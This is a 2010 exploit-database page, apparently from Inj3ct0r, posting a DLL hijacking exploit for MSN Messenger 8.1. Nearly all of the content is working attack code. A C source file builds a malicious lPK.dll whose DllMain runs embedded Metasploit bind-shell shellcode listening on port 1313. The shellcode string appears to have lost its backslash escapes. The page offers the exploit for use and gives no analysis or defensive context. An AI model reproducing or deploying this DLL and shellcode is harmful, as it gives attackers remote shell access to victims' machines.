[local exploits] - MSN Messenger 8.1 DLL Hijacking Exploit (
Posted on 10 October 2010
<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Strict//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd'><html xmlns='http://www.w3.org/1999/xhtml'><head><meta http-equiv='Content-Type' content='text/html; charset=utf-8' /><meta http-equiv='Content-Language' content='en' /><title>MSN Messenger 8.1 DLL Hijacking Exploit (lPK.dll) | Inj3ct0r - exploit database : vulnerability : 0day : shellcode</title><meta name='description' content='MSN Messenger 8.1 DLL Hijacking Exploit (lPK.dll) by Mu$lim in local exploits | Inj3ct0r - exploit database : vulnerability : 0day : shellcode' /><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon' /><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss' /><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></head><body><pre>================================================= MSN Messenger 8.1 DLL Hijacking Exploit (lPK.dll) ================================================= /* Exploit Title: MSN Messenger 8.1 DLL Hijacking Exploit (lPK.dll) Date: Octobre 7, 2010 Author: Mu$lim redouan@live.ma Version: 8.1 Tested on: Windows XP SP3 fr File Vulnerable: - msnmsgr.exe - livecall.exe - */ #include <windows.h> #define DllExport __declspec (dllexport) /* * windows/shell_bind_tcp - 476 bytes * http://www.metasploit.com * Encoder: x86/shikata_ga_nai * LPORT=1313, RHOST=, EXITFUNC=process, InitialAutoRunScript=, * AutoRunScript= */ unsigned char buf[] = "x33xc9xb1x71xd9xccxd9x74x24xf4x5axb8x8bxf0x6b" "x88x31x42x14x03x42x14x83xeax77x12x9ex51x4bx0a" "x15x46xa7x13x2exc4x17x2dx90xfax5ex1cx44xccx17" "x46x1axc1x2bx7bx6bx0bxc9xcbx79xf3x02x70xa7x1c" "x1ax18x5exeax0ex4cx26x6dx61x78x82x18x2ex5cxb0" "x47x78xb2xc4x13xa2x2bxfax10xe4x75x67xb5x3cx0f" "xd8xbcxefxaexddxf7x7cx02x82xd9x94x69xf6x52x08" "xc3xddx4dx9fx38x1fx4cx58x59x99x20xcex33x2bxe6" "x9ex58x2ax15x3axe7xacx30x0fxd9x19xf0xbcx96xe1" "xc5xdcxfcxe7x42x6ex35x16x4axf8x16x82x92x75xcd" "x72xb0x29x9exe4xadxa0x37x18x21xf9x5ax28xcaxc7" "x9exa3x1dxd5xe7xbexcexb6x58x9ax29xdcx1axbax13" "x72x13x09x87x4cx1cxf4x9ax33x30x57x38x59x4fx63" "x4ax8fxdfx2bxc7x3bx4ax2dx22x97x08x8dxf0x36x57" "x04x14x71x65x45x49xf3x0cx20xaex9dxefxc1xecxe7" "xcbx29x4fx12x65x23x10xb5xbcx8dxa0xafxc8x72x85" "x6cx72x2exe8x22x8fx3bx16x40x86x68x80x7dxafxf4" "xd1xcdxf6x7exd5x29x45xdbx05x92x29xc8xe2xb4x13" "xfbxebx3bx9ex9cxfex62xacx9dxa1x5cx9bx40x3fx12" "xc6x92xf6x5cx16xdbx64x62xcdx20x58x5fx69x71x80" "x11xa4xdex36xf3x73x53x86x07xbax93x68x03x99xaf" "xf7xd5x91x1fxcbxc3x0ex66x94xdcx5ax69x57xe3x76" "x21x98x42x03x51x0ex59x36x6fx8dxcax74xfax6ex45" "x1dx97x67x4bx6fxc2xa6xebxe2x6dxc0x1axe7xaex0b" "x40xc5xbex68x96xbbx8exe3x0fx6exb4x4ex25x14xe0" "xd0xa4x5ex63xeaxb6xecx72x47xbbxf2x2dx24xcexa1" "x5dx4fx3bx15xf7x43x09x8dx49x29xa6x4exf2x38xcc" "x9cx3fx40x37x0dx9dxe6x85x77xb4x01xf8x66x3fx0a" "x04x88x79x50xebx51xa7xf6x13x98x88xe5x92x8bx5d" "xc4x69x69xdbx3ax19x03xf8xf5xdex75x17x75x1dxd3" "x80x55xd3x72xcbxd5x04x7cx2dxbdxddx09xeex44x57" "x5ax72x31xacxfbx9bxf9x5fx59xb0xfd"; BOOL WINAPI DllMain ( HANDLE hinstDLL, DWORD fdwReason, LPVOID lpvReserved) { int (*func)(); func = (int (*)()) buf; (int)(*func)(); return 0; } # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-10-10]</pre></body></html>
